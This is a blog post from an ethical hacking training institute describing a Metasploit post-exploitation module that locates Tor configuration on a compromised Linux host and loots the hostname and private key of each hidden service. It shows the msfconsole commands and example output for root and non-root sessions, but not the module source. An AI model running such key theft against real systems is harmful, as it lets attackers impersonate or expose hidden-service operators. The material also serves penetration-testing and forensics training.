Grab TOR hidden service configurations in linux – Advance Footprinting

HomeMetasploit, Papers

Institute For Ethical Hacking Course and Ethical Hacking Training in Pune – India
Extreme Hacking | Sadik Shaikh | Cyber Suraksha Abhiyan

Credit: xcellerator

This is nice and clean post exploitation that steals hostnames and private keys of TOR hidden services originating from the target machine. The technique can be used and implemented in Advance Footprinting as well as Forensics.

Tested against Debian GNU/Linux 8 running kernel version 3.16.0-4-amd64 from Arch Linux kernel version 4.11.3-1-ARCH

What it does

Searches for the TOR configuration file “torrc” (typically /etc/tor/torrc, but could change).
Parses the found file for lines starting with “HiddenServiceDir” and grabs the locations of the hidden services on the system (again, typically /var/lib/tor/… on most distros by default).
Finally loots the files “hostname” and “private_key” found in each of these folders.

Example Output for root session

msf > use post/linux/gather/tor_hiddenservices
msf post(tor_hiddenservices) > set SESSION 1
SESSION => 1
msf post(tor_hiddenservices) > run

[*] Running module against 10.0.2.15
[*] Info:
[*] 	Debian GNU/Linux 8  
[*] 	Linux hidden 3.16.0-4-amd64 #1 SMP Debian 3.16.43-2 (2017-04-30) x86_64 GNU/Linux
[*] Looking for torrc...
[+] Torrc file found at /etc/tor/torrc
[+] Hidden Services found!
[*] hidden stored in /home/user/.msf4/loot/20170606210603_default_192.168.1.140_tor.hidden.hostn_479046.txt
[*] hidden stored in /home/user/.msf4/loot/20170606210603_default_192.168.1.140_tor.hidden.priva_933706.txt
[*] Post module execution completed

Example Output for non-root session

msf > use post/linux/gather/tor_hiddenservices
msf post(tor_hiddenservices) > set SESSION 2
SESSION => 2
msf post(tor_hiddenservices) > run

[*] Running module against 10.0.2.15
[*] Info:
[*] 	Debian GNU/Linux 8  
[*] 	Linux hidden 3.16.0-4-amd64 #1 SMP Debian 3.16.43-2 (2017-04-30) x86_64 GNU/Linux
[*] Looking for torrc...
[+] Torrc file found at /etc/tor/torrc
[+] Hidden Services found!
[-] Hidden Services were found, but we need root to access the directories
[*] Post module execution completed

www.extremehacking.org
Sadik Shaikh | Cyber Suraksha Abhiyan, Ethical Hacking Training Institute, CEHv9,CHFI,ECSAv9,CAST,ENSA, CCNA, 
CCNA SECURITY,MCITP,RHCE,CHECKPOINT, ASA FIREWALL,VMWARE,CLOUD,ANDROID,IPHONE,NETWORKING HARDWARE,TRAINING INSTITUTE IN PUNE, 
Certified Ethical Hacking,Center For Advanced Security Training in India, ceh v9 course in Pune-India, ceh certification in pune-India, 
ceh v9 training in Pune-India, Ethical Hacking Course in Pune-India

By Sadik Shaikh|June 19th, 2017|Metasploit, Papers|